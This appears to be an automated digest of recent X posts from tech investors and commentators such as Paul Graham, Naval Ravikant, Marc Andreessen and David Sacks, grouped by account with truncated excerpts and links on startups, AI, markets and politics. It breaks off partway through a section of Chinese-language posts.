Image can create full Lego sets! With actual Bricklink IDs so you can order the parts and build it. Whole ne…\n[原文链接](https://x.com/paulg/status/2048413815675539816)\n\n**[2026-04-26T14:47:09+00:00]**\n> Every post, I block and report a couple accounts using AI-generated replies. It feels much the same as picking up litter on a city street; I don't know if it has any effect, but it feels like I ought…\n[原文链接](https://x.com/paulg/status/2048413578789634100)\n\n**[2026-04-26T14:40:28+00:00]**\n> Durer was the original Dr Seuss.\n[原文链接](https://x.com/paulg/status/2048411898081583547)\n\n**[2026-04-26T14:36:59+00:00]**\n> Writing a talk to give in Stockholm. The prospect of speaking to a large group of people is no longer frightening, but writing a talk is as much work as ever. I'm no longer afraid of audiences, but I…\n[原文链接](https://x.com/paulg/status/2048411021329453562)\n\n**[2026-04-26T13:37:21+00:00]**\n> RT by @paulg: 'Action is now needed': Over 60 ex-U.K. ambassadors call to sanction Israel over West Bank https://www.haaretz.com/west-bank/2026-04-26/ty-article/.premium/over-60-ex-uk-ambassadors-cal…\n[原文链接](https://x.com/paulg/status/2048396013816152216)\n\n**[2026-04-26T11:57:10+00:00]**\n> Good use of camouflage by Biscuit.\n[原文链接](https://x.com/paulg/status/2048370801833828507)\n\n**[2026-04-25T14:17:57+00:00]**\n> RT by @paulg: Journalists worldwide should stand up for colleagues who are murdered.\n[原文链接](https://x.com/paulg/status/2048043843690561556)\n\n**[2026-04-25T12:34:34+00:00]**\n> RT by @paulg: Here's YC's official advice about being truthful and precise about what is pilot, bookings, revenue and recurring revenue. Founders, particularly first time founders, need to sear this …\n[原文链接](https://x.com/paulg/status/2048017824895909901)\n\n**[2026-04-25T10:55:23+00:00]**\n> RT by @paulg: 23 years old with no advanced mathematics training solves Erdős problem with ChatGPT Pro. \"What’s beginning to emerge is that the problem was maybe easier than expected, and it was like…\n[原文链接](https://x.com/paulg/status/2047992864118894954)\n\n**[2026-04-25T08:33:48+00:00]**\n> RT by @paulg: GitHub outages since Microsoft acquisition 🤣\n[原文链接](https://x.com/paulg/status/2047957234664030380)\n\n---\n\n### ✅ @naval — Naval Ravikant(11 条)\n\n**[2026-04-29T06:01:47+00:00]**\n> \"Savings Tax.\"\n[原文链接](https://x.com/naval/status/2049368528445403351)\n\n**[2026-04-29T04:45:11+00:00]**\n> R to @naval: Apple: http://apple.co/4cF5VWZ Spotify: http://open.spotify.com/episode/5C1aTaJwlpkGC7Lj0cqDrx YouTube: http://youtu.be/hTdSU7q5WCo Transcript: http://nav.al/code — Presented by AngelLis…\n[原文链接](https://x.com/naval/status/2049349252112089553)\n\n**[2026-04-29T04:45:10+00:00]**\n> New podcast on vibe coding - A Return to Code. A Return to Coding 00:20 The Personal App Store 03:17 Vibe Coding Is a Video Game with Real-World Rewards 06:22 Pure Software Is Uninvestable 10:33 A Pl…\n[原文链接](https://x.com/naval/status/2049349249905951175)\n\n**[2026-04-28T04:41:00+00:00]**\n> RT by @naval: Unfortunately, those in power in Sacramento seem blind to second order effects. We are now in a situation where this wealth tax is very likely to pass. This means founders who control t…\n[原文链接](https://x.com/naval/status/2048985810842865914)\n\n**[2026-04-24T11:53:43+00:00]**\n> RT by @naval: Fundrise VCX is exactly why USVC needs to exist. Retail wants access to OpenAI, Anthropic, SpaceX, xAI, etc. That demand is not going away. VCX turned that demand into a liquid public w…\n[原文链接](https://x.com/naval/status/2047645157080658335)\n\n**[2026-04-24T05:39:10+00:00]**\n> R to @naval: x.com/avlok/status/204754692…\n[原文链接](https://x.com/naval/status/2047550896670908809)\n\n**[2026-04-24T05:23:22+00:00]**\n> RT by @naval: I’ve seen a lot of questions about USVC, AngelList’s newest product. First, don’t invest in venture capital if you can’t afford to lose your money. Put your savings somewhere safer. But…\n[原文链接](https://x.com/naval/status/2047546920747307466)\n\n**[2026-04-24T03:37:14+00:00]**\n> Hari nails it: “Don’t listen to people who don’t know how private markets work.”\n[原文链接](https://x.com/naval/status/2047520212787015748)\n\n**[2026-04-24T03:33:25+00:00]**\n> R to @naval: x.com/haridigresses/status/2…\n[原文链接](https://x.com/naval/status/2047519250433421604)\n\n**[2026-04-24T02:58:19+00:00]**\n> R to @naval: x.com/nivi/status/2047471220…\n[原文链接](https://x.com/naval/status/2047510419565420779)\n\n**[2026-04-22T16:34:52+00:00]**\n> Introducing USVC - a single basket of high-growth venture capital, for everyone. No accreditation required, SEC-registered, and a very low $500 minimum. Includes OpenAI, Anthropic, xAI, Sierra, Cruso…\n[原文链接](https://x.com/naval/status/2046991137022648800)\n\n---\n\n### ✅ @pmarca — Marc Andreessen(20 条)\n\n**[2026-04-28T20:26:28+00:00]**\n> Image\n[原文链接](https://x.com/pmarca/status/2049223746368483370)\n\n**[2026-04-28T20:20:22+00:00]**\n> “YouTube videos about AI, but with no soyface”\n[原文链接](https://x.com/pmarca/status/2049222212008206717)\n\n**[2026-04-28T18:27:56+00:00]**\n> The AI we thought we’d get was bloodless alien machine intelligence. The AI we actually got was the complete knowledge and culture of our civilization reflected back at us. Of course we will love it …\n[原文链接](https://x.com/pmarca/status/2049193915249574141)\n\n**[2026-04-28T18:25:59+00:00]**\n> Many such cases?\n[原文链接](https://x.com/pmarca/status/2049193427120603173)\n\n**[2026-04-28T18:06:36+00:00]**\n> Asking AI to ask questions is hugely underrated.\n[原文链接](https://x.com/pmarca/status/2049188549342138449)\n\n**[2026-04-28T18:06:07+00:00]**\n> American Intelligence\n[原文链接](https://x.com/pmarca/status/2049188427921334606)\n\n**[2026-04-28T17:45:34+00:00]**\n> Found the AI killer app.\n[原文链接](https://x.com/pmarca/status/2049183253764936068)\n\n**[2026-04-28T07:08:35+00:00]**\n> Overheard in Silicon Valley: “Alexander wept, for there were no more situations left to monitor.” cc @MTSlive\n[原文链接](https://x.com/pmarca/status/2049022953031950466)\n\n**[2026-04-28T05:44:36+00:00]**\n> It’s a mystery. We’ll never know.\n[原文链接](https://x.com/pmarca/status/2049001817015529591)\n\n**[2026-04-28T05:41:22+00:00]**\n> Actual anti-AI energy is the newest instance of @robkhenderson’s “luxury beliefs” — a small fringe of elites playing at radical politics. For normal people, AI is a useful app on their phone, and the…\n[原文链接](https://x.com/pmarca/status/2049001003823829379)\n\n**[2026-04-28T05:32:39+00:00]**\n> It won’t happen. People say all kinds of things in surveys. Watch what they do instead. And what they do is… use AI.\n[原文链接](https://x.com/pmarca/status/2048998808143425821)\n\n**[2026-04-28T04:49:55+00:00]**\n> Oh no\n[原文链接](https://x.com/pmarca/status/2048988054220615991)\n\n**[2026-04-28T02:50:17+00:00]**\n> 👀\n[原文链接](https://x.com/pmarca/status/2048957950816137683)\n\n**[2026-04-28T02:38:33+00:00]**\n> Thomas Sowell: “Verbal virtuosity”.\n[原文链接](https://x.com/pmarca/status/2048954994842612091)\n\n**[2026-04-28T02:36:20+00:00]**\n> Key retardmaxxing method, 10/10 no notes.\n[原文链接](https://x.com/pmarca/status/2048954437897777249)\n\n**[2026-04-28T02:26:44+00:00]**\n> The smart people work for the… less smart people.\n[原文链接](https://x.com/pmarca/status/2048952024348373321)\n\n**[2026-04-28T02:25:05+00:00]**\n> It wasn’t AI, it was the COVID hiring binge + interest rate spike hangover.\n[原文链接](https://x.com/pmarca/status/2048951609124909387)\n\n**[2026-04-28T01:04:27+00:00]**\n> \"default presumption is that productivity gains lead to increased demand. burden of persuasion is with the doomers to show why this time is gonna be different.\"\n[原文链接](https://x.com/pmarca/status/2048931314330685922)\n\n**[2026-04-28T00:55:51+00:00]**\n> \"thats not a sign of an economy about to collapse, thats a sign of a tool so productive that time itself becomes the bottleneck.\"\n[原文链接](https://x.com/pmarca/status/2048929149205831923)\n\n**[2026-04-27T18:24:14+00:00]**\n> RT by @pmarca: Wow I'm actually shocked that the SPLC was featured in the latest Nathan For You episode.\n[原文链接](https://x.com/pmarca/status/2048830598752739496)\n\n---\n\n### ✅ @david_tiantian — David Tian Wang(0 条)\n\n---\n\n### ✅ @morganhousel — Morgan Housel(1 条)\n\n**[2026-04-22T18:05:41+00:00]**\n> \"Self-control is empathy with your future self.\" - Seinfeld\n[原文链接](https://x.com/morganhousel/status/2047013991046881663)\n\n---\n\n### ✅ @eladgil — Elad Gil(10 条)\n\n**[2026-04-27T20:41:36+00:00]**\n> Mon afternoon song 2 (remix much better then original) https://www.youtube.com/watch?v=fLdTlfK_5KQ&list=RDGMEMWO-g6DgCWEqKlDtKbJA1Gw&start_radio=1&rv=dvQJIgjlR3I\n[原文链接](https://x.com/eladgil/status/2048865167233200586)\n\n**[2026-04-27T20:35:37+00:00]**\n> Mon afternoon song https://www.youtube.com/watch?v=dvQJIgjlR3I\n[原文链接](https://x.com/eladgil/status/2048863662396658146)\n\n**[2026-04-27T16:36:07+00:00]**\n> RT by @eladgil: \"Every society at it's apex ultimately has built large public art to inspire the next generation\" @eladgil\n[原文链接](https://x.com/eladgil/status/2048803386938495412)\n\n**[2026-04-24T18:44:49+00:00]**\n> RT by @eladgil: Adopting Claude speak in my regular life, episode 1: Partner: Did you do the dishes tonight? Me: Yes they're done. Partner: Why are they still dirty? Me: You're right to push back. I …\n[原文链接](https://x.com/eladgil/status/2047748613976264835)\n\n**[2026-04-24T01:35:02+00:00]**\n> New life plan- Move to Brooklyn Get neck tat Ride bike everywhere Cold brew own coffee (also start drinking coffee) Adopt 12 year old stray cat, name him Nietzsche Vape mango pods, but ironically Wea…\n[原文链接](https://x.com/eladgil/status/2047489459378397604)\n\n**[2026-04-23T21:04:47+00:00]**\n> RT by @eladgil: How does one make sense of SF? We are living through the craziest computing revolution of the last 2 decades....and 95% of the value being created is within a 4-mile radius in SF (h/t…\n[原文链接](https://x.com/eladgil/status/2047421448449630379)\n\n**[2026-04-23T17:55:03+00:00]**\n> Entrepreneurship is a distributed search job across the surface of commercial opportunities\n[原文链接](https://x.com/eladgil/status/2047373700643844303)\n\n**[2026-04-23T17:20:32+00:00]**\n> Big congrats\n[原文链接](https://x.com/eladgil/status/2047365014500389353)\n\n**[2026-04-23T17:19:56+00:00]**\n> My view is the AI boom will only accelerate and is a once in a lifetime transformation This is orthogonal to whether many AI companies should exit in next 12-18 months, as some may lack durability vs…\n[原文链接](https://x.com/eladgil/status/2047364865527075139)\n\n**[2026-04-22T20:39:39+00:00]**\n> <3 @infisical\n[原文链接](https://x.com/eladgil/status/2047052737762980083)\n\n---\n\n### ✅ @DavidSacks — David Sacks(20 条)\n\n**[2026-04-27T17:47:07+00:00]**\n> Cole Allen didn’t need to go down a fringe rabbit hole to become radicalized. He just needed to believe the MSM’s inflammatory rhetoric, lies, and hoaxes about Trump.\n[原文链接](https://x.com/DavidSacks/status/2048821257534111863)\n\n**[2026-04-27T17:16:26+00:00]**\n> R to @DavidSacks: x.com/a16z/status/1985413352…\n[原文链接](https://x.com/DavidSacks/status/2048813533136060459)\n\n**[2026-04-27T17:15:33+00:00]**\n> R to @DavidSacks: The problem with most of the “AI Safety” crowd is that their solutions always favor more government centralization and control. In other words, they will bring about the Orwellian f…\n[原文链接](https://x.com/DavidSacks/status/2048813311668486300)\n\n**[2026-04-27T17:08:20+00:00]**\n> Concerning. As I’ve said many times before, the biggest risk of AI isn’t James Cameron’s The Terminator, it’s George Orwell’s 1984.\n[原文链接](https://x.com/DavidSacks/status/2048811495224390105)\n\n**[2026-04-26T20:42:24+00:00]**\n> MSM hoax factories like the Atlantic love to allege conflicts of interest without ever disclosing their own.\n[原文链接](https://x.com/DavidSacks/status/2048502978626113625)\n\n**[2026-04-26T17:37:26+00:00]**\n> RT by @DavidSacks: Accurate\n[原文链接](https://x.com/DavidSacks/status/2048456433981591867)\n\n**[2026-04-26T15:03:35+00:00]**\n> RT by @DavidSacks: Cole Allen, the gunman from last night’s WH Correspondents Dinner, maintained an active online presence, especially on the leftwing social media platform Bluesky where he went by t…\n[原文链接](https://x.com/DavidSacks/status/2048417712439689346)\n\n**[2026-04-25T18:47:09+00:00]**\n> RT by @DavidSacks: .@POTUS: \"We want to beat China at the industry. We're leading with crypto, we're leading with AI, and I really feel I have an obligation... as a President, I have to be able to ma…\n[原文链接](https://x.com/DavidSacks/status/2048111588930986354)\n\n**[2026-04-25T13:54:41+00:00]**\n> RT by @DavidSacks: Probably the best take I have heard on why there is so much fear around software exposure in private equity and credit because of AI From David Sacks \"Historically we only had two …\n[原文链接](https://x.com/DavidSacks/status/2048037985765949537)\n\n**[2026-04-25T03:16:09+00:00]**\n> RT by @DavidSacks: Incredible return on investment! 💰💰💰\n[原文链接](https://x.com/DavidSacks/status/2047877294476116184)\n\n**[2026-04-25T02:52:39+00:00]**\n> SPLC invested $270k in Charlottesville and got $81 million in additional donations. Extraordinary returns.\n[原文链接](https://x.com/DavidSacks/status/2047871382923469241)\n\n**[2026-04-25T02:37:36+00:00]**\n> Marc Benioff is the apex cloud founder. He and Salesforce have turned every previous technology wave to their advantage. Cloud, social, mobile, big data. I predict AI will be no different.\n[原文链接](https://x.com/DavidSacks/status/2047867592790946189)\n\n**[2026-04-25T00:55:54+00:00]**\n> RT by @DavidSacks: SACKS: “We're really lucky that [Trump] is President … when this AI revolution is happening.” JASON: “What would happen if Kamala ‘Ding Dong’ was in right now?” SACKS: “We'd have n…\n[原文链接](https://x.com/DavidSacks/status/2047842000632713369)\n\n**[2026-04-24T23:41:01+00:00]**\n> RT by @DavidSacks: David Sacks: We're lucky that Trump's the President when this AI revolution is happening. @Jason \"Do an alt history, Sacks, what would happen if Kamala Ding Dong was in right now?\"…\n[原文链接](https://x.com/DavidSacks/status/2047823154655932696)\n\n**[2026-04-24T22:41:49+00:00]**\n> RT by @DavidSacks: POD UP! Core four is back 🚨 Big show: -- SpaceX-Cursor deal, using compute as leverage -- SaaS debt bomb coming to PE?, venture debt risk -- Software bloodbath, buy low potential? …\n[原文链接](https://x.com/DavidSacks/status/2047808256047821141)\n\n**[2026-04-24T16:41:47+00:00]**\n> R to @DavidSacks: UPDATE: the DOJ has joined @xAI’s lawsuit against Colorado on First Amendment grounds. AI models should not be required to alter truthful output to comply with DEI.\n[原文链接](https://x.com/DavidSacks/status/2047717649849659586)\n\n**[2026-04-24T15:43:39+00:00]**\n> RT by @DavidSacks: David Sacks on Anthropic-Pentagon dispute, Musk-Altman feud and SpaceX-Cursor deal: https://cnb.cx/4d3HAKp\n[原文链接](https://x.com/DavidSacks/status/2047703023690924289)\n\n**[2026-04-24T15:10:25+00:00]**\n> RT by @DavidSacks: .@DavidSacks: \"We know that @AnthropicAI makes good products. They are smart people, there’s no question about it... we don’t care what their personal views are. What we care about…\n[原文链接](https://x.com/DavidSacks/status/2047694657107165519)\n\n**[2026-04-24T13:41:49+00:00]**\n> R to @DavidSacks: Full article: https://www.wsj.com/lifestyle/careers/are-college-graduates-finally-catching-a-break-in-this-job-market-38c37541?st=fxk6Dg&reflink=article_copyURL_share\n[原文链接](https://x.com/DavidSacks/status/2047672359377588241)\n\n**[2026-04-24T13:39:13+00:00]**\n> Narrative violation: Hiring of new college graduates is up 5.6% over last year. Youth unemployment for degreed 20–24‑year‑olds fell to 5.3% from 8.9%. Weren’t we told that 50% of entry-level jobs wer…\n[原文链接](https://x.com/DavidSacks/status/2047671706660073767)\n\n---\n\n### ✅ @HarryStebbings — Harry Stebbings(20 条)\n\n**[2026-04-29T01:24:00+00:00]**\n> \"SBC becomes a problem when stock prices fall and dilution explodes. What was 3% annual dilution can quickly become 10%, creating a downward spiral that is hard to escape. The fix is to be far more s…\n[原文链接](https://x.com/HarryStebbings/status/2049298621951058341)\n\n**[2026-04-29T00:05:00+00:00]**\n> \"No, layoffs alone will not fix the problem. If a company has become bloated, simply cutting 50% often just leaves you with half the same mediocrity. The real issue is culture and talent quality, and…\n[原文链接](https://x.com/HarryStebbings/status/2049278741583643076)\n\n**[2026-04-28T22:24:00+00:00]**\n> \"You cannot have only A players in every role, some functions are just there to keep the business running. But you can build a team where the people you keep are the highest performers in those roles…\n[原文链接](https://x.com/HarryStebbings/status/2049253323329704378)\n\n**[2026-04-28T21:21:16+00:00]**\n> I am worried by the constraining exit options for venture backed companies: 1. IPOs: You can’t IPO with less than $500M in revenue and even then, it’s not a slam dunk. Everyone that has so far has be…\n[原文链接](https://x.com/HarryStebbings/status/2049237538901020767)\n\n**[2026-04-28T20:31:00+00:00]**\n> Do the majority of company teams need to be rebuilt for the technology we have today? \"Yes, teams need to be rebuilt for the AI era. If roles are going to be automated or not adapting fast enough, yo…\n[原文链接](https://x.com/HarryStebbings/status/2049224886128722345)\n\n**[2026-04-28T18:28:00+00:00]**\n> The Best Founders are Not Motivated by Money: \"Founders don't tend to be motivated by money as well. The best are motivated by personal growth development, being inspired, finding things intellectual…\n[原文链接](https://x.com/HarryStebbings/status/2049193932144164986)\n\n**[2026-04-28T15:14:00+00:00]**\n> Why investors need to give CEOs better comp packages: \"We went public in 21. First year, the stock went up to about 40BN market cap. In 2022, we fell 92% to a little under $4 billion market cap. For …\n[原文链接](https://x.com/HarryStebbings/status/2049145110491967672)\n\n**[2026-04-28T13:02:27+00:00]**\n> When I was 22 I was offered £18M (all cash) for 20VC media company. With any tough decision, I went for a walk with my mother, she asked me one question: “What would you do tomorrow if you did sell t…\n[原文链接](https://x.com/HarryStebbings/status/2049112007475855369)\n\n**[2026-04-28T11:57:12+00:00]**\n> A venture firm saying we should have a podcast is like when they say they think AI is going to be big.\n[原文链接](https://x.com/HarryStebbings/status/2049095586335343034)\n\n**[2026-04-28T01:24:00+00:00]**\n> What No One Knows That Everyone Should Know About Being CEO of a Public Company: \"The other thing that people miss is that the CEO's job in a company, especially one that's gone from small to very, v…\n[原文链接](https://x.com/HarryStebbings/status/2048936233993413097)\n\n**[2026-04-27T21:38:00+00:00]**\n> Why it is sub-optimal for founders to also be angel investing: \"I don't invest anymore, for a couple reasons. 1. In order to invest, you've got to sell shares in your own business to have liquidity t…\n[原文链接](https://x.com/HarryStebbings/status/2048879359318958273)\n\n**[2026-04-27T18:45:00+00:00]**\n> The Truth About Being a CEO and a Parent: \"I felt like for my children, I became more distant 'cause I wasn't paying attention to them. I think any founder knows this experience. If they have kids, y…\n[原文链接](https://x.com/HarryStebbings/status/2048835822292725957)\n\n**[2026-04-27T14:02:33+00:00]**\n> R to @HarryStebbings: Spotify https://open.spotify.com/episode/5KPihKzCMKY2DnPeuSxXZ5 Apple Podcasts https://podcasts.apple.com/us/podcast/20vc-applovin-%24160bn-market-cap-%245-48bn-revenue-%2410m/i…\n[原文链接](https://x.com/HarryStebbings/status/2048764743205134644)\n\n**[2026-04-27T14:02:33+00:00]**\n> Adam Foroughi is by far one of the best CEOs I have ever interviewed. Candidly he is insanely stern and cold but also obsessive, focused and utterly brilliant. With Adam there is zero fluff, like non…\n[原文链接](https://x.com/HarryStebbings/status/2048764741435179442)\n\n**[2026-04-27T13:30:16+00:00]**\n> Two areas I would love to invest that are non-technical: 1. Egg freezing clinics. In 10 years, strongly believe every 21 year old will freeze their eggs and it becomes the norm. Amazing business. Ins…\n[原文链接](https://x.com/HarryStebbings/status/2048756619622707452)\n\n**[2026-04-26T22:34:46+00:00]**\n> We hired someone for the investing team. Something I never planned to do. They sent the team 3 new deals per day for 90 days straight. All aligned to our stage, geography and deal type. That’s how yo…\n[原文链接](https://x.com/HarryStebbings/status/2048531257399664920)\n\n**[2026-04-26T19:35:39+00:00]**\n> I have interviewed 1,000 of the best CEOs of the last 10 years. Adam Foroughi, Founder @AppLovin is easily top 3, ever. $160BN Market Cap $5.48BN Revenue $10M EBITDA per head 82%+ margins Just 450 pe…\n[原文链接](https://x.com/HarryStebbings/status/2048486182904852537)\n\n**[2026-04-26T15:07:55+00:00]**\n> Seeing two types of founders emerge in this moment: The tourists and the terminators. The terminators are salivating at the opportunity ahead. Hungrier than ever. More ambitious than ever. They want …\n[原文链接](https://x.com/HarryStebbings/status/2048418806867870115)\n\n**[2026-04-26T13:56:31+00:00]**\n> The best founders I know all text their investors. None of them email them. The relationship will blossom and deepen in a matter of messages.\n[原文链接](https://x.com/HarryStebbings/status/2048400836024283246)\n\n**[2026-04-24T21:38:00+00:00]**\n> This week I got to sit down with two truly generational CEOs and ask them anything: @tobi @Shopify ($160BN Market Cap) Adam Foroughi @AppLovin ($160BN Market Cap) I have the best job in the world.\n[原文链接](https://x.com/HarryStebbings/status/2047792195868967172)\n\n---\n\n### ✅ @jason — Jason Calacanis(20 条)\n\n**[2026-04-29T01:07:12+00:00]**\n> Big Zesty 💪\n[原文链接](https://x.com/jason/status/2049294394075849059)\n\n**[2026-04-29T00:05:58+00:00]**\n> Oh lordy... here comes the lawfare madness again 🤦 86 when I grew up in the restaurant business meant “to get rid of” something (ie “86 clams” meant to take clams off the menu). I was told it had two…\n[原文链接](https://x.com/jason/status/2049278984513310783)\n\n**[2026-04-28T23:51:30+00:00]**\n> Not investment advice…. but WERE AT A FOUR YEAR HIGH AND WE CRUSHED EARNINGS 😂😂🤦😂😂 Never change Philly!!!\n[原文链接](https://x.com/jason/status/2049275346109796388)\n\n**[2026-04-28T23:50:25+00:00]**\n> Lock in, GAME FIVE, @knicks fam! @BenStiller @jalenbrunson1 @Arifromanhattan \"\">@CPTheFanchise @jerryferrara @MrChuckD @RealChalamet @fredwilson @msavino @JDSportsTalkNY @nihalmehta @WorldWideWob @Bi…\n[原文链接](https://x.com/jason/status/2049275070800150851)\n\n**[2026-04-28T22:28:53+00:00]**\n> If this passes, what impact (if any) do you think @RoKhanna’s $25 minimum wage will have on unemployment rate in California? Show your work.\n[原文链接](https://x.com/jason/status/2049254554550653047)\n\n**[2026-04-28T19:59:07+00:00]**\n> There are five things you can focus on in your life that will help you lead a balanced and fulfilling life.\n[原文链接](https://x.com/jason/status/2049216863574364182)\n\n**[2026-04-28T19:58:37+00:00]**\n> If you're feeling unbalanced in your life, I highly recommend checking in on my big five.\n[原文链接](https://x.com/jason/status/2049216735912329567)\n\n**[2026-04-28T19:55:41+00:00]**\n> We're all standing on the shoulders of Adam Curry and Dave Weiner.\n[原文链接](https://x.com/jason/status/2049215999795138656)\n\n**[2026-04-28T19:54:02+00:00]**\n> RT by @Jason: Peter Thiel: “We’ve tried to do too much investing in Europe. It’s always sort of a junket.” “It’s a nice place to go on vacation as an investor.” “It’s a very strange thing—the US is s…\n[原文链接](https://x.com/jason/status/2049215583351341460)\n\n**[2026-04-28T19:52:16+00:00]**\n> AutoLane is my next uber.\n[原文链接](https://x.com/jason/status/2049215140810072429)\n\n**[2026-04-28T19:52:00+00:00]**\n> The future is autonomous, and auto lane is going to play a major role in managing autonomy for giant parking lots! Highly recommend listening to this podcast to understand what the future will look l…\n[原文链接](https://x.com/jason/status/2049215070970814469)\n\n**[2026-04-28T19:51:11+00:00]**\n> What album or two do you have in deep rotation at the moment? It could be from the archives or it could be a brand new selection.\n[原文链接](https://x.com/jason/status/2049214864912978399)\n\n**[2026-04-28T18:53:59+00:00]**\n> .@ZohranKMamdani is about to kill the Golden Goose\n[原文链接](https://x.com/jason/status/2049200471651353064)\n\n**[2026-04-28T18:33:33+00:00]**\n> might not be accurate for much longer...\n[原文链接](https://x.com/jason/status/2049195328092471563)\n\n**[2026-04-28T18:19:33+00:00]**\n> RT by @Jason: Looks like we've successfully ragebaited the CCP 🫠\n[原文链接](https://x.com/jason/status/2049191806135324774)\n\n**[2026-04-28T16:30:48+00:00]**\n> RT by @Jason: “Sam Altman comes from the Zuckerberg school of business: give dumb people access to your tools, study them and, like the Borg, steal every innovation they have.” - @Jason they're not j…\n[原文链接](https://x.com/jason/status/2049164438989672648)\n\n**[2026-04-27T22:48:45+00:00]**\n> RT by @Jason: China is blocking Meta’s Manus acquisition, and it might just be our news story of the year. If a startup is strategically important, the CCP can just reach through with a “golden share…\n[原文链接](https://x.com/jason/status/2048897167234826325)\n\n**[2026-04-27T21:35:25+00:00]**\n> Image\n[原文链接](https://x.com/jason/status/2048878709784928524)\n\n**[2026-04-27T21:27:19+00:00]**\n> Another one ☝️\n[原文链接](https://x.com/jason/status/2048876670090727866)\n\n**[2026-04-27T17:13:52+00:00]**\n> This Beanie Can Read Your Thoughts… https://x.com/i/broadcasts/1qGvvkZPWgRGB\n[原文链接](https://x.com/jason/status/2048812889838928269)\n\n---\n\n### ✅ @charliebilello — Charlie Bilello(15 条)\n\n**[2026-04-29T01:56:48+00:00]**\n> R to @charliebilello: x.com/charliebilello/status/…\n[原文链接](https://x.com/charliebilello/status/2049306875301130507)\n\n**[2026-04-29T01:55:13+00:00]**\n> US home prices increased 0.7% over the last year, the slowest growth rate since June 2023. There are currently a record 46% more sellers than buyers nationally. Absent manipulation from the Federal G…\n[原文链接](https://x.com/charliebilello/status/2049306480071873011)\n\n**[2026-04-29T01:23:28+00:00]**\n> Since the start of the Iran war... Jet Fuel: +70% Sulfur: +60% Brent Crude Oil: +52% Heating Oil: +52% WTI Crude Oil: +48% Urea: +48% Diesel: +45% Gasoline: +40% European Nat Gas: +36% Fertilizer: +2…\n[原文链接](https://x.com/charliebilello/status/2049298490489004357)\n\n**[2026-04-28T19:48:10+00:00]**\n> RT by @charliebilello: Tomorrow's News Today... BREAKING: NO CHANGE. THE FED HOLDS INTEREST RATES STEADY AT 3.50-3.75%, CITING CONTINUED UNCERTAINTY OVER THE WAR IN IRAN AND ITS IMPACT ON ECONOMIC GR…\n[原文链接](https://x.com/charliebilello/status/2049214106352107778)\n\n**[2026-04-28T12:21:00+00:00]**\n> RT by @charliebilello: Media Math… More Negative/Sensationalist = More Viewers = Higher Prices for Advertising = Larger Profits = Happier Shareholders Nowhere in the formula will you find educating, …\n[原文链接](https://x.com/charliebilello/status/2049101573477806428)\n\n**[2026-04-28T02:04:33+00:00]**\n> The top 0.1% of income earners in California make 12% of the state's total income and pay 27% of total income taxes. The bottom 50% of income earners make 12% of total income and pay 3% of total inco…\n[原文链接](https://x.com/charliebilello/status/2048946440173416655)\n\n**[2026-04-28T01:39:57+00:00]**\n> R to @charliebilello: A record 43% of these underwater car buyers are opting for 84-month (7-year) loans. Their average monthly payment: $932, the highest level ever recorded.\n[原文链接](https://x.com/charliebilello/status/2048940251079430151)\n\n**[2026-04-28T01:34:15+00:00]**\n> RT by @charliebilello: 30% of car buyers trading in vehicles in the US now have negative equity, owing an average of $7,200 on their old loans.\n[原文链接](https://x.com/charliebilello/status/2048938813385269297)\n\n**[2026-04-27T21:17:46+00:00]**\n> RT by @charliebilello: Since the start of the Iran war Jet Fuel: +68% Sulfur: +59% Heating Oil: +52% Urea: +49% Brent Crude Oil: +49% Diesel: +45% WTI Crude Oil: +44% European Natural Gas: +38% Gasol…\n[原文链接](https://x.com/charliebilello/status/2048874268478382262)\n\n**[2026-04-27T21:11:08+00:00]**\n> RT by @charliebilello: The S&P 500 ended the day at another all-time high, its 10th of the year. Video: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=646s\n[原文链接](https://x.com/charliebilello/status/2048872600416243932)\n\n**[2026-04-27T16:21:01+00:00]**\n> RT by @charliebilello: Americans spent over $109 billion on lottery tickets last year, which is more than they spent on movies, books, concerts and sports tickets - combined.\n[原文链接](https://x.com/charliebilello/status/2048799590044852390)\n\n**[2026-04-27T13:50:42+00:00]**\n> RT by @charliebilello: 2026 is following the same playbook as 2025. Only difference is traders have become much more immune to extreme rhetoric and have been more confident in buying the dip, sending…\n[原文链接](https://x.com/charliebilello/status/2048761760971096534)\n\n**[2026-04-27T13:16:36+00:00]**\n> RT by @charliebilello: The S&P 500's CAPE Ratio has moved up to 41, its highest level since 2000 and now above 99% of historical valuations. $SPX Video: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=…\n[原文链接](https://x.com/charliebilello/status/2048753179471323584)\n\n**[2026-04-27T13:08:19+00:00]**\n> RT by @charliebilello: With 28% of companies reported, S&P 500 1st quarter earnings are up 15% over the prior year, the 13th consecutive quarter of positive YoY growth. $SPX Video: https://www.youtub…\n[原文链接](https://x.com/charliebilello/status/2048751094671585397)\n\n**[2026-04-25T19:55:14+00:00]**\n> RT by @charliebilello: New video is up: 📈The Week in Charts - breaking down the most important charts and themes in markets... https://www.youtube.com/watch?v=p5e0ThPjIAg\n[原文链接](https://x.com/charliebilello/status/2048128721286992166)\n\n---\n\n### ✅ @WarriorTrading — Warrior Trading(0 条)\n\n---\n\n### ✅ @CryptoCred — Credible Crypto(1 条)\n\n**[2026-04-22T22:25:51+00:00]**\n> Dev is posting about price\n[原文链接](https://x.com/CryptoCred/status/2047079463750377958)\n\n---\n\n### ✅ @AltcoinBuzz — AltcoinBuzz(0 条)\n\n---\n\n### ✅ @svwang1 — 王川(硅谷)(6 条)\n\n**[2026-04-29T00:48:58+00:00]**\n> 旧金山湾区的地铁站花了九千万美元在入口处加了高高的门,这样逃票变得非常困难。不仅每年增加了一千万美元收入,而且地铁变得更加干净安全,之前要做的各种清理工作减少了 95%。 和外界交往的过程中,增加各种严格的过滤筛选机制,是保护自己,提高效率的一个重要必备的措施。因为成本的原因而对外不设防,就是准备把自己变成垃圾场。\n[原文链接](https://x.com/svwang1/status/2049289806241550791)\n\n**[2026-04-28T22:20:52+00:00]**\n> 人写的文章像面条,再乱,最终还是可以梳理出头绪。ai 写的文章像一锅粥,最后不知所云。\n[原文链接](https://x.com/svwang1/status/2049252535689757003)\n\n**[2026-04-25T01:59:39+00:00]**\n> 自 2021年创立到 2026年三月初累积收入 (不是利润)五十亿美元出头的 anthropic, 在二级市场的估值已经超过一万亿美元。 2025年经营现金流 459亿美元, 税后利润 669亿美元的 Berkshire, 市值也是一万亿美元。\n[原文链接](https://x.com/svwang1/status/2047858045057909226)\n\n**[2026-04-24T15:45:26+00:00]**\n> 投资巴菲特的 Berkshire Hathaway 不能让你暴富,但可以让已经富的人继续富下去。 投资 AI 